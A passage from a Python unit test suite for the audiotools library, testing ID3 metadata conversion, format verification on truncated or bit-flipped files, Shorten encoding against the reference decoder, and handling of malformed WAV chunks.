#sticks, even through get/set_metadata
track.set_metadata(dummy_metadata)
for new_class in (audiotools.ID3v22Comment,
audiotools.ID3v23Comment,
audiotools.ID3v24Comment,
audiotools.ID3v23Comment,
audiotools.ID3v22Comment):
metadata = new_class.converted(track.get_metadata())
track.set_metadata(metadata)
metadata = track.get_metadata()
self.assertEqual(isinstance(metadata, new_class), True)
self.assertEqual(metadata.__class__, new_class([]).__class__)
self.assertEqual(metadata, dummy_metadata)
finally:
temp_file.close()
@FORMAT_MP3
def test_ucs2(self):
temp_file = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
track = self.audio_class.from_pcm(temp_file.name,
BLANK_PCM_Reader(5))
#this should be 4 characters long in UCS-4 environments
#if not, we're in a UCS-2 environment
#which is limited to 16 bits anyway
test_string = u'f\U0001d55foo'
#u'\ufffd' is the "not found" character
#this string should result from escaping through UCS-2
test_string_out = u'f\ufffdoo'
if (len(test_string) == 4):
self.assertEqual(test_string,
test_string.encode('utf-16').decode('utf-16'))
self.assertEqual(test_string.encode('ucs2').decode('ucs2'),
test_string_out)
#ID3v2.4 supports UTF-8/UTF-16
metadata = audiotools.ID3v24Comment.converted(
audiotools.MetaData(track_name=u"Foo"))
track.set_metadata(metadata)
id3 = track.get_metadata()
self.assertEqual(id3, metadata)
metadata.track_name = test_string
track.set_metadata(metadata)
id3 = track.get_metadata()
self.assertEqual(id3, metadata)
metadata.comment = test_string
track.set_metadata(metadata)
id3 = track.get_metadata()
self.assertEqual(id3, metadata)
metadata.add_image(
audiotools.ID3v24Comment.IMAGE_FRAME.converted(
audiotools.ID3v24Comment.IMAGE_FRAME_ID,
audiotools.Image.new(TEST_COVER1,
test_string,
0)))
track.set_metadata(metadata)
id3 = track.get_metadata()
self.assertEqual(id3.images()[0].description, test_string)
#ID3v2.3 and ID3v2.2 only support UCS-2
for id3_class in (audiotools.ID3v23Comment,
audiotools.ID3v22Comment):
metadata = audiotools.ID3v23Comment.converted(
audiotools.MetaData(track_name=u"Foo"))
track.set_metadata(metadata)
id3 = track.get_metadata()
self.assertEqual(id3, metadata)
#ensure that text fields round-trip correctly
#(i.e. the extra-wide char gets replaced)
metadata.track_name = test_string
track.set_metadata(metadata)
id3 = track.get_metadata()
self.assertEqual(id3.track_name, test_string_out)
#ensure that comment blocks round-trip correctly
metadata.comment = test_string
track.set_metadata(metadata)
id3 = track.get_metadata()
self.assertEqual(id3.track_name, test_string_out)
#ensure that image comment fields round-trip correctly
metadata.add_image(id3_class.IMAGE_FRAME.converted(
id3_class.IMAGE_FRAME_ID,
audiotools.Image.new(TEST_COVER1,
test_string,
0)))
track.set_metadata(metadata)
id3 = track.get_metadata()
self.assertEqual(id3.images()[0].description,
test_string_out)
finally:
temp_file.close()
class MP2FileTest(MP3FileTest):
def setUp(self):
self.audio_class = audiotools.MP2Audio
self.suffix = "." + self.audio_class.SUFFIX
class OggVerify:
@FORMAT_VORBIS
@FORMAT_OPUS
@FORMAT_OGGFLAC
def test_verify(self):
good_file = tempfile.NamedTemporaryFile(suffix=self.suffix)
bad_file = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
good_track = self.audio_class.from_pcm(
good_file.name,
BLANK_PCM_Reader(1))
good_file.seek(0, 0)
good_file_data = good_file.read()
self.assertEqual(len(good_file_data),
os.path.getsize(good_file.name))
bad_file.write(good_file_data)
bad_file.flush()
track = audiotools.open(bad_file.name)
self.assertEqual(track.verify(), True)
#first, try truncating the file
for i in xrange(len(good_file_data)):
f = open(bad_file.name, "wb")
f.write(good_file_data[0:i])
f.flush()
self.assertEqual(os.path.getsize(bad_file.name), i)
self.assertRaises(audiotools.InvalidFile,
track.verify)
#then, try flipping a bit
for i in xrange(len(good_file_data)):
for j in xrange(8):
bad_file_data = list(good_file_data)
bad_file_data[i] = chr(ord(bad_file_data[i]) ^ (1 << j))
f = open(bad_file.name, "wb")
f.write("".join(bad_file_data))
f.close()
self.assertEqual(os.path.getsize(bad_file.name),
len(good_file_data))
self.assertRaises(audiotools.InvalidFile,
track.verify)
finally:
good_file.close()
bad_file.close()
if (self.audio_class is audiotools.OpusAudio):
#opusdec doesn't currently reject invalid
#streams like it should
#so the encoding test doesn't work right
#(this is a known bug)
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
track = self.audio_class.from_pcm(
temp.name,
BLANK_PCM_Reader(1))
self.assertEqual(track.verify(), True)
good_data = open(temp.name, 'rb').read()
f = open(temp.name, 'wb')
f.write(good_data[0:min(100, len(good_data) - 1)])
f.close()
if (os.path.isfile("dummy.wav")):
os.unlink("dummy.wav")
self.assertEqual(os.path.isfile("dummy.wav"), False)
self.assertRaises(audiotools.EncodingError,
track.convert,
"dummy.wav",
audiotools.WaveAudio)
self.assertEqual(os.path.isfile("dummy.wav"), False)
finally:
temp.close()
class OggFlacFileTest(OggVerify,
LosslessFileTest):
def setUp(self):
from audiotools.decoders import OggFlacDecoder
self.audio_class = audiotools.OggFlacAudio
self.suffix = "." + self.audio_class.SUFFIX
self.decoder = OggFlacDecoder
@FORMAT_OGGFLAC
def test_init(self):
#check missing file
self.assertRaises(audiotools.flac.InvalidFLAC,
audiotools.OggFlacAudio,
"/dev/null/foo")
#check invalid file
invalid_file = tempfile.NamedTemporaryFile(suffix=".oga")
try:
for c in "invalidstringxxx":
invalid_file.write(c)
invalid_file.flush()
self.assertRaises(audiotools.flac.InvalidFLAC,
audiotools.OggFlacAudio,
invalid_file.name)
finally:
invalid_file.close()
#check some decoder errors,
#mostly to ensure a failed init doesn't make Python explode
self.assertRaises(TypeError, self.decoder)
self.assertRaises(TypeError, self.decoder, None)
self.assertRaises(ValueError, self.decoder, "/dev/null", -1)
class ShortenFileTest(TestForeignWaveChunks,
TestForeignAiffChunks,
LosslessFileTest):
def setUp(self):
self.audio_class = audiotools.ShortenAudio
self.suffix = "." + self.audio_class.SUFFIX
from audiotools.decoders import SHNDecoder
from audiotools.encoders import encode_shn
self.decoder = SHNDecoder
self.encode = encode_shn
self.encode_opts = [{"block_size": 4},
{"block_size": 256},
{"block_size": 1024}]
@FORMAT_SHORTEN
def test_init(self):
#check missing file
self.assertRaises(audiotools.shn.InvalidShorten,
audiotools.ShortenAudio,
"/dev/null/foo")
#check invalid file
invalid_file = tempfile.NamedTemporaryFile(suffix=".shn")
try:
for c in "invalidstringxxx":
invalid_file.write(c)
invalid_file.flush()
self.assertRaises(audiotools.shn.InvalidShorten,
audiotools.ShortenAudio,
invalid_file.name)
finally:
invalid_file.close()
#check some decoder errors,
#mostly to ensure a failed init doesn't make Python explode
self.assertRaises(TypeError, self.decoder)
self.assertRaises(TypeError, self.decoder, None)
self.assertRaises(IOError, self.decoder, "/dev/null/foo")
@FORMAT_SHORTEN
def test_bits_per_sample(self):
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for bps in (8, 16):
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, bits_per_sample=bps))
self.assertEqual(track.bits_per_sample(), bps)
track2 = audiotools.open(temp.name)
self.assertEqual(track2.bits_per_sample(), bps)
finally:
temp.close()
@FORMAT_SHORTEN
def test_verify(self):
#test changing the file underfoot
temp = tempfile.NamedTemporaryFile(suffix=".shn")
try:
shn_data = open("shorten-frames.shn", "rb").read()
temp.write(shn_data)
temp.flush()
shn_file = audiotools.open(temp.name)
self.assertEqual(shn_file.verify(), True)
for i in xrange(0, len(shn_data.rstrip(chr(0)))):
f = open(temp.name, "wb")
f.write(shn_data[0:i])
f.close()
self.assertRaises(audiotools.InvalidFile,
shn_file.verify)
#unfortunately, Shorten doesn't have any checksumming
#or other ways to reliably detect swapped bits
finally:
temp.close()
#testing truncating various Shorten files
for (first, last, filename) in [(62, 89, "shorten-frames.shn"),
(61, 116, "shorten-lpc.shn")]:
f = open(filename, "rb")
shn_data = f.read()
f.close()
temp = tempfile.NamedTemporaryFile(suffix=".shn")
try:
for i in xrange(0, first):
temp.seek(0, 0)
temp.write(shn_data[0:i])
temp.flush()
self.assertEqual(os.path.getsize(temp.name), i)
self.assertRaises(IOError,
audiotools.decoders.SHNDecoder,
temp.name)
for i in xrange(first, len(shn_data[0:last].rstrip(chr(0)))):
temp.seek(0, 0)
temp.write(shn_data[0:i])
temp.flush()
self.assertEqual(os.path.getsize(temp.name), i)
decoder = audiotools.decoders.SHNDecoder(temp.name)
self.assertNotEqual(decoder, None)
self.assertRaises(IOError,
decoder.pcm_split)
decoder = audiotools.decoders.SHNDecoder(temp.name)
self.assertNotEqual(decoder, None)
self.assertRaises(IOError,
audiotools.transfer_framelist_data,
decoder, lambda x: x)
finally:
temp.close()
#test running convert() on a truncated file
#triggers EncodingError
temp = tempfile.NamedTemporaryFile(suffix=".shn")
try:
temp.write(open("shorten-frames.shn", "rb").read()[0:-10])
temp.flush()
flac = audiotools.open(temp.name)
if (os.path.isfile("dummy.wav")):
os.unlink("dummy.wav")
self.assertEqual(os.path.isfile("dummy.wav"), False)
self.assertRaises(audiotools.EncodingError,
flac.convert,
"dummy.wav",
audiotools.WaveAudio)
self.assertEqual(os.path.isfile("dummy.wav"), False)
finally:
temp.close()
def __stream_variations__(self):
for stream in [
test_streams.Sine8_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
test_streams.Sine8_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
test_streams.Sine8_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
test_streams.Sine8_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
test_streams.Sine8_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
test_streams.Sine8_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine8_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
test_streams.Sine8_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
test_streams.Sine8_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
test_streams.Sine8_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
test_streams.Sine8_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
test_streams.Sine16_Mono(200000, 48000, 441.0, 0.50, 441.0, 0.49),
test_streams.Sine16_Mono(200000, 96000, 441.0, 0.61, 661.5, 0.37),
test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 882.0, 0.49),
test_streams.Sine16_Mono(200000, 44100, 441.0, 0.50, 4410.0, 0.49),
test_streams.Sine16_Mono(200000, 44100, 8820.0, 0.70, 4410.0, 0.29),
test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine16_Stereo(200000, 48000, 441.0, 0.61, 661.5, 0.37, 1.0),
test_streams.Sine16_Stereo(200000, 96000, 441.0, 0.50, 882.0, 0.49, 1.0),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.0),
test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 1.0),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 441.0, 0.49, 0.5),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.61, 661.5, 0.37, 2.0),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 882.0, 0.49, 0.7),
test_streams.Sine16_Stereo(200000, 44100, 441.0, 0.50, 4410.0, 0.49, 1.3),
test_streams.Sine16_Stereo(200000, 44100, 8820.0, 0.70, 4410.0, 0.29, 0.1),
test_streams.Simple_Sine(200000, 44100, 0x7, 8,
(25, 10000),
(50, 20000),
(120, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x33, 8,
(25, 10000),
(50, 20000),
(75, 30000),
(65, 40000)),
test_streams.Simple_Sine(200000, 44100, 0x37, 8,
(25, 10000),
(35, 15000),
(45, 20000),
(50, 25000),
(55, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x3F, 8,
(25, 10000),
(45, 15000),
(65, 20000),
(85, 25000),
(105, 30000),
(120, 35000)),
test_streams.Simple_Sine(200000, 44100, 0x7, 16,
(6400, 10000),
(12800, 20000),
(30720, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x33, 16,
(6400, 10000),
(12800, 20000),
(19200, 30000),
(16640, 40000)),
test_streams.Simple_Sine(200000, 44100, 0x37, 16,
(6400, 10000),
(8960, 15000),
(11520, 20000),
(12800, 25000),
(14080, 30000)),
test_streams.Simple_Sine(200000, 44100, 0x3F, 16,
(6400, 10000),
(11520, 15000),
(16640, 20000),
(21760, 25000),
(26880, 30000),
(30720, 35000))]:
yield stream
@FORMAT_SHORTEN
def test_streams(self):
for g in self.__stream_variations__():
md5sum = md5()
f = g.read(audiotools.FRAMELIST_SIZE)
while (len(f) > 0):
md5sum.update(f.to_bytes(False, True))
f = g.read(audiotools.FRAMELIST_SIZE)
self.assertEqual(md5sum.digest(), g.digest())
g.close()
def __test_reader__(self, pcmreader, **encode_options):
if (not audiotools.BIN.can_execute(audiotools.BIN["shorten"])):
self.assert_(False,
"reference Shorten binary shorten(1) required for this test")
temp_file = tempfile.NamedTemporaryFile(suffix=".shn")
#construct a temporary wave file from pcmreader
temp_input_wave_file = tempfile.NamedTemporaryFile(suffix=".wav")
temp_input_wave = audiotools.WaveAudio.from_pcm(
temp_input_wave_file.name, pcmreader)
temp_input_wave.verify()
options = encode_options.copy()
(head, tail) = temp_input_wave.wave_header_footer()
options["is_big_endian"] = False
options["signed_samples"] = (pcmreader.bits_per_sample == 16)
options["header_data"] = head
if (len(tail) > 0):
options["footer_data"] = tail
self.encode(temp_file.name,
temp_input_wave.to_pcm(),
**options)
shn = audiotools.open(temp_file.name)
self.assert_(shn.total_frames() > 0)
temp_wav_file1 = tempfile.NamedTemporaryFile(suffix=".wav")
temp_wav_file2 = tempfile.NamedTemporaryFile(suffix=".wav")
#first, ensure the Shorten-encoded file
#has the same MD5 signature as pcmreader once decoded
md5sum = md5()
d = self.decoder(temp_file.name)
f = d.read(audiotools.FRAMELIST_SIZE)
while (len(f) > 0):
md5sum.update(f.to_bytes(False, True))
f = d.read(audiotools.FRAMELIST_SIZE)
d.close()
self.assertEqual(md5sum.digest(), pcmreader.digest())
#then compare our .to_wave() output
#with that of the Shorten reference decoder
shn.convert(temp_wav_file1.name, audiotools.WaveAudio)
subprocess.call([audiotools.BIN["shorten"],
"-x", shn.filename, temp_wav_file2.name])
wave = audiotools.WaveAudio(temp_wav_file1.name)
wave.verify()
wave = audiotools.WaveAudio(temp_wav_file2.name)
wave.verify()
self.assertEqual(audiotools.pcm_frame_cmp(
audiotools.WaveAudio(temp_wav_file1.name).to_pcm(),
audiotools.WaveAudio(temp_wav_file2.name).to_pcm()),
None)
temp_file.close()
temp_wav_file1.close()
temp_wav_file2.close()
#then perform PCM -> aiff -> Shorten -> PCM testing
#construct a temporary wave file from pcmreader
temp_input_aiff_file = tempfile.NamedTemporaryFile(suffix=".aiff")
temp_input_aiff = temp_input_wave.convert(temp_input_aiff_file.name,
audiotools.AiffAudio)
temp_input_aiff.verify()
options = encode_options.copy()
options["is_big_endian"] = True
options["signed_samples"] = True
(head, tail) = temp_input_aiff.aiff_header_footer()
options["header_data"] = head
if (len(tail) > 0):
options["footer_data"] = tail
self.encode(temp_file.name,
temp_input_aiff.to_pcm(),
**options)
shn = audiotools.open(temp_file.name)
self.assert_(shn.total_frames() > 0)
temp_aiff_file1 = tempfile.NamedTemporaryFile(suffix=".aiff")
temp_aiff_file2 = tempfile.NamedTemporaryFile(suffix=".aiff")
#first, ensure the Shorten-encoded file
#has the same MD5 signature as pcmreader once decoded
md5sum = md5()
d = self.decoder(temp_file.name)
f = d.read(audiotools.BUFFER_SIZE)
while (len(f) > 0):
md5sum.update(f.to_bytes(False, True))
f = d.read(audiotools.BUFFER_SIZE)
d.close()
self.assertEqual(md5sum.digest(), pcmreader.digest())
#then compare our .to_aiff() output
#with that of the Shorten reference decoder
shn.convert(temp_aiff_file1.name, audiotools.AiffAudio)
subprocess.call([audiotools.BIN["shorten"],
"-x", shn.filename, temp_aiff_file2.name])
aiff = audiotools.AiffAudio(temp_aiff_file1.name)
aiff.verify()
aiff = audiotools.AiffAudio(temp_aiff_file2.name)
aiff.verify()
self.assertEqual(audiotools.pcm_frame_cmp(
audiotools.AiffAudio(temp_aiff_file1.name).to_pcm(),
audiotools.AiffAudio(temp_aiff_file2.name).to_pcm()),
None)
temp_file.close()
temp_input_aiff_file.close()
temp_input_wave_file.close()
temp_aiff_file1.close()
temp_aiff_file2.close()
@FORMAT_SHORTEN
def test_small_files(self):
for g in [test_streams.Generate01,
test_streams.Generate02,
test_streams.Generate03,
test_streams.Generate04]:
gen = g(44100)
self.__test_reader__(gen, block_size=256)
@FORMAT_SHORTEN
def test_full_scale_deflection(self):
for (bps, fsd) in [(8, test_streams.fsd8),
(16, test_streams.fsd16)]:
for pattern in [test_streams.PATTERN01,
test_streams.PATTERN02,
test_streams.PATTERN03,
test_streams.PATTERN04,
test_streams.PATTERN05,
test_streams.PATTERN06,
test_streams.PATTERN07]:
stream = test_streams.MD5Reader(fsd(pattern, 100))
self.__test_reader__(
stream, block_size=256)
@FORMAT_SHORTEN
def test_sines(self):
for g in self.__stream_variations__():
self.__test_reader__(g, block_size=256)
@FORMAT_SHORTEN
def test_blocksizes(self):
noise = struct.unpack(">32h", os.urandom(64))
for block_size in [4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
256, 1024]:
args = {"block_size": block_size}
self.__test_reader__(test_streams.MD5Reader(
test_streams.FrameListReader(noise, 44100, 1, 16)), **args)
@FORMAT_SHORTEN
def test_noise(self):
for opts in self.encode_opts:
encode_opts = opts.copy()
for (channels, mask) in [
(1, audiotools.ChannelMask.from_channels(1)),
(2, audiotools.ChannelMask.from_channels(2)),
(4, audiotools.ChannelMask.from_fields(
front_left=True,
front_right=True,
back_left=True,
back_right=True)),
(8, audiotools.ChannelMask(0))]:
for bps in [8, 16]:
self.__test_reader__(
MD5_Reader(EXACT_RANDOM_PCM_Reader(
pcm_frames=65536,
sample_rate=44100,
channels=channels,
channel_mask=mask,
bits_per_sample=bps)),
**encode_opts)
@FORMAT_SHORTEN
def test_python_codec(self):
def test_python_reader(pcmreader, block_size=256):
from audiotools.py_encoders import encode_shn
temp_file = tempfile.NamedTemporaryFile(suffix=".shn")
audiotools.ShortenAudio.from_pcm(
temp_file.name,
pcmreader,
block_size=block_size,
encoding_function=encode_shn)
from audiotools.decoders import SHNDecoder as SHNDecoder1
from audiotools.py_decoders import SHNDecoder as SHNDecoder2
self.assertEqual(audiotools.pcm_frame_cmp(
SHNDecoder1(temp_file.name),
SHNDecoder2(temp_file.name)), None)
temp_file.close()
#test small files
for g in [test_streams.Generate01,
test_streams.Generate02,
test_streams.Generate03,
test_streams.Generate04]:
gen = g(44100)
test_python_reader(gen, block_size=256)
#test full scale deflection
for (bps, fsd) in [(8, test_streams.fsd8),
(16, test_streams.fsd16)]:
for pattern in [test_streams.PATTERN01,
test_streams.PATTERN02,
test_streams.PATTERN03,
test_streams.PATTERN04,
test_streams.PATTERN05,
test_streams.PATTERN06,
test_streams.PATTERN07]:
stream = test_streams.MD5Reader(fsd(pattern, 100))
test_python_reader(stream, block_size=256)
#test sines
for g in [test_streams.Sine8_Mono(5000, 48000,
441.0, 0.50, 441.0, 0.49),
test_streams.Sine8_Stereo(5000, 48000,
441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Sine16_Mono(5000, 48000,
441.0, 0.50, 441.0, 0.49),
test_streams.Sine16_Stereo(5000, 48000,
441.0, 0.50, 441.0, 0.49, 1.0),
test_streams.Simple_Sine(5000, 44100, 0x7, 8,
(25, 10000),
(50, 20000),
(120, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x33, 8,
(25, 10000),
(50, 20000),
(75, 30000),
(65, 40000)),
test_streams.Simple_Sine(5000, 44100, 0x37, 8,
(25, 10000),
(35, 15000),
(45, 20000),
(50, 25000),
(55, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x3F, 8,
(25, 10000),
(45, 15000),
(65, 20000),
(85, 25000),
(105, 30000),
(120, 35000)),
test_streams.Simple_Sine(5000, 44100, 0x7, 16,
(6400, 10000),
(12800, 20000),
(30720, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x33, 16,
(6400, 10000),
(12800, 20000),
(19200, 30000),
(16640, 40000)),
test_streams.Simple_Sine(5000, 44100, 0x37, 16,
(6400, 10000),
(8960, 15000),
(11520, 20000),
(12800, 25000),
(14080, 30000)),
test_streams.Simple_Sine(5000, 44100, 0x3F, 16,
(6400, 10000),
(11520, 15000),
(16640, 20000),
(21760, 25000),
(26880, 30000),
(30720, 35000))]:
test_python_reader(g, block_size=256)
#test block sizes
noise = struct.unpack(">32h", os.urandom(64))
for block_size in [4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
256, 1024]:
test_python_reader(
test_streams.FrameListReader(noise, 44100, 1, 16),
block_size=block_size)
#test noise
for block_size in [4, 256, 1024]:
for (channels, mask) in [
(1, audiotools.ChannelMask.from_channels(1)),
(2, audiotools.ChannelMask.from_channels(2)),
(4, audiotools.ChannelMask.from_fields(
front_left=True,
front_right=True,
back_left=True,
back_right=True)),
(8, audiotools.ChannelMask(0))]:
for bps in [8, 16]:
test_python_reader(
EXACT_RANDOM_PCM_Reader(
pcm_frames=5000,
sample_rate=44100,
channels=channels,
channel_mask=mask,
bits_per_sample=bps),
block_size=block_size)
class VorbisFileTest(OggVerify, LossyFileTest):
def setUp(self):
self.audio_class = audiotools.VorbisAudio
self.suffix = "." + self.audio_class.SUFFIX
@FORMAT_VORBIS
def test_channels(self):
if (self.audio_class is audiotools.AudioFile):
return
temp = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
for channels in [1, 2, 3, 4, 5, 6]:
track = self.audio_class.from_pcm(temp.name, BLANK_PCM_Reader(
1, channels=channels, channel_mask=0))
self.assertEqual(track.channels(), channels)
track = audiotools.open(temp.name)
self.assertEqual(track.channels(), channels)
finally:
temp.close()
@FORMAT_VORBIS
def test_big_comment(self):
track_file = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
track = self.audio_class.from_pcm(track_file.name,
BLANK_PCM_Reader(1))
pcm = track.to_pcm()
original_pcm_sum = md5()
audiotools.transfer_framelist_data(pcm, original_pcm_sum.update)
pcm.close()
comment = audiotools.MetaData(
track_name=u"Name",
track_number=1,
comment=u"abcdefghij" * 13005)
track.set_metadata(comment)
track = audiotools.open(track_file.name)
self.assertEqual(comment, track.get_metadata())
pcm = track.to_pcm()
new_pcm_sum = md5()
audiotools.transfer_framelist_data(pcm, new_pcm_sum.update)
pcm.close()
self.assertEqual(original_pcm_sum.hexdigest(),
new_pcm_sum.hexdigest())
finally:
track_file.close()
@FORMAT_AUDIOFILE
def test_replay_gain(self):
self.assert_(True)
#FIXME
#ReplayGain gets punted to vorbisgain,
#so we won't test it directly.
#In the future, I should fold libvorbis
#into the tools directly
#and handle gain calculation/application
#as floats from end-to-end
#which should eliminate the vorbisgain requirement.
class OpusFileTest(OggVerify, LossyFileTest):
def setUp(self):
self.audio_class = audiotools.OpusAudio
self.suffix = "." + self.audio_class.SUFFIX
@FORMAT_OPUS
def test_channels(self):
#FIXME - test Opus channel assignment
pass
@FORMAT_OPUS
def test_big_comment(self):
track_file = tempfile.NamedTemporaryFile(
suffix="." + self.audio_class.SUFFIX)
try:
track = self.audio_class.from_pcm(track_file.name,
BLANK_PCM_Reader(1))
pcm = track.to_pcm()
original_pcm_sum = md5()
audiotools.transfer_framelist_data(pcm, original_pcm_sum.update)
pcm.close()
comment = audiotools.MetaData(
track_name=u"Name",
track_number=1,
comment=u"abcdefghij" * 13005)
track.set_metadata(comment)
track = audiotools.open(track_file.name)
self.assertEqual(comment, track.get_metadata())
pcm = track.to_pcm()
new_pcm_sum = md5()
audiotools.transfer_framelist_data(pcm, new_pcm_sum.update)
pcm.close()
self.assertEqual(original_pcm_sum.hexdigest(),
new_pcm_sum.hexdigest())
finally:
track_file.close()
class WaveFileTest(TestForeignWaveChunks,
LosslessFileTest):
def setUp(self):
self.audio_class = audiotools.WaveAudio
self.suffix = "." + self.audio_class.SUFFIX
@FORMAT_WAVE
def test_verify(self):
#test various truncated files with verify()
for wav_file in ["wav-8bit.wav",
"wav-1ch.wav",
"wav-2ch.wav",
"wav-6ch.wav"]:
temp = tempfile.NamedTemporaryFile(suffix=".wav")
try:
wav_data = open(wav_file, 'rb').read()
temp.write(wav_data)
temp.flush()
wave = audiotools.open(temp.name)
#try changing the file out from under it
for i in xrange(0, len(wav_data)):
f = open(temp.name, 'wb')
f.write(wav_data[0:i])
f.close()
self.assertEqual(os.path.getsize(temp.name), i)
self.assertRaises(audiotools.InvalidFile,
wave.verify)
finally:
temp.close()
#test running convert() on a truncated file
#triggers EncodingError
#FIXME - truncate file underfoot
# temp = tempfile.NamedTemporaryFile(suffix=".flac")
# try:
# temp.write(open("wav-2ch.wav", "rb").read()[0:-10])
# temp.flush()
# flac = audiotools.open(temp.name)
# if (os.path.isfile("dummy.wav")):
# os.unlink("dummy.wav")
# self.assertEqual(os.path.isfile("dummy.wav"), False)
# self.assertRaises(audiotools.EncodingError,
# flac.convert,
# "dummy.wav",
# audiotools.WaveAudio)
# self.assertEqual(os.path.isfile("dummy.wav"), False)
# finally:
# temp.close()
#test other truncated file combinations
for (fmt_size, wav_file) in [(0x24, "wav-8bit.wav"),
(0x24, "wav-1ch.wav"),
(0x24, "wav-2ch.wav"),
(0x3C, "wav-6ch.wav")]:
f = open(wav_file, 'rb')
wav_data = f.read()
f.close()
temp = tempfile.NamedTemporaryFile(suffix=".wav")
try:
#first, check that a truncated fmt chunk raises an exception
#at init-time
for i in xrange(0, fmt_size + 8):
temp.seek(0, 0)
temp.write(wav_data[0:i])
temp.flush()
self.assertEqual(os.path.getsize(temp.name), i)
self.assertRaises(audiotools.InvalidFile,
audiotools.WaveAudio,
temp.name)
finally:
temp.close()
#test for non-ASCII chunk IDs
from struct import pack
chunks = list(audiotools.open("wav-2ch.wav").chunks()) + \
[audiotools.wav.RIFF_Chunk("fooz", 10, chr(0) * 10)]
temp = tempfile.NamedTemporaryFile(suffix=".wav")
try:
audiotools.WaveAudio.wave_from_chunks(temp.name,
iter(chunks))
f = open(temp.name, 'rb')
wav_data = list(f.read())
f.close()
wav_data[-15] = chr(0)
temp.seek(0, 0)
temp.write("".join(wav_data))
temp.flush()
self.assertRaises(audiotools.InvalidFile,
audiotools.open(temp.name).verify)
finally:
temp.close()
FMT = audiotools.wav.RIFF_Chunk(
"fmt ",
16,
'\x01\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00')
DATA = audiotools.wav.RIFF_Chunk(
"data",
26,
'\x00\x00\x01\x00\x02\x00\x03\x00\x02\x00\x01\x00\x00\x00\xff\xff\xfe\xff\xfd\xff\xfe\xff\xff\xff\x00\x00')
#test multiple fmt chunks
temp = tempfile.NamedTemporaryFile(suffix=".wav")
try:
for chunks in [[FMT, FMT, DATA],
[FMT, DATA, FMT]]:
audiotools.WaveAudio.wave_from_chunks(temp.name, chunks)
self.assertRaises(
audiotools.InvalidFile,
audiotools.open(temp.name).verify)
finally:
temp.close()
#test multiple data chunks
temp = tempfile.NamedTemporaryFile(suffix=".wav")
try:
audiotools.WaveAudio.wave_from_chunks(temp.name, [FMT, DATA, DATA])
self.assertRaises(
audiotools.InvalidFile,
audiotools.open(temp.name).verify)
finally:
temp.close()
#test data chunk before fmt chunk
temp = tempfile.NamedTemporaryFile(suffix=".wav")
try:
audiotools.WaveAudio.wave_from_chunks(temp.name, [DATA, FMT])
self.assertRaises(
audiotools.InvalidFile,
audiotools.open(temp.name).verify)
finally:
temp.close()
#test no fmt chunk
temp = tempfile.NamedTemporaryFile(suffix=".wav")
try:
audiotools.WaveAudio.wave_from_chunks(temp.name, [DATA])
self.assertRaises(
audiotools.InvalidFile,
audiotools.open(temp.name).verify)
finally:
temp.close()
#test no data chunk
temp = tempfile.NamedTemporaryFile(suffix=".wav")
try:
audiotools.WaveAudio.wave_from_chunks(temp.name, [FMT])
self.assertRaises(
audiotools.InvalidFile,
audiotools.open(temp.name).verify)
finally:
temp.close()
@FORMAT_WAVE
def test_clean(self):
FMT = audiotools.wav.RIFF_Chunk(
"fmt ",
16,
'\x01\x00\x01\x00D\xac\x00\x00\x88X\x01\x00\x02\x00\x10\x00')
DATA = audiotools.wav.RIFF_Chunk(
"data",
26,
'\x00\x00\x01\x00\x02\x00\x03\x00\x02\x00\x01\x00\x00\x00\xff\xff\xfe\xff\xfd\xff\xfe\xff\xff\xff\x00\x00')
#test multiple fmt chunks
#test multiple data chunks
#test data chunk before fmt chunk
temp = tempfile.NamedTemporaryFile(suffix=".wav")
fixed = tempfile.NamedTemporaryFile(suffix=".wav")
try:
for chunks in [[FMT, FMT, DATA],
[FMT, DATA, FMT],
[FMT, DATA, DATA],
[DATA, FMT],
[DATA, FMT, FMT]]:
audiotools.WaveAudio.wave_from_chunks(temp.name, chunks)
fixes = []
wave = audiotools.open(temp.name).clean(fixes, fixed.name)
chunks = list(wave.chunks())
self.assertEquals([c.id for c in chunks],
[c.id for c in [FMT, DATA]])
